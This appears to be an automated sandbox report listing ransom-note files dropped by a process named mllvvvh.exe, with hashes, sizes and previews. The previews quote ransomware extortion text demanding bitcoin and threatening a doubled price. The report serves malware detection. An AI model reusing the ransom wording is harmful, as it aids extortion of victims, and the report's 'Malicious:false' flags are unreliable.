                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
